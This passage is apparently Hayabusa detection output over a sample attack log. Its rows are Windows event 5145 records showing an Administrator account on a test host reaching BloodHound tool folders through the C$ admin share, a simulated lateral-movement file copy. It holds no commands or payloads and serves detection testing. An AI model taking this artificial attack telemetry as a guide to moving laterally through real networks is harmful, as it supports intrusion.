0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.247 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.247 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.257 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.257 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.257 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.267 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.267 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.267 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.277 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.277 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.277 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.277 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.287 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.287 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.297 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.297 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.297 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.307 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.317 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.317 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.317 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.317 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.327 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.327 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.327 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.327 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.337 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.337 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.337 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.337 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.347 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.347 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.347 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.347 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.357 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.357 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.357 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.357 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.367 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.367 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.367 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.367 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.377 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.377 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.377 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.377 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.387 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.387 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.387 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.387 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.397 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.397 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 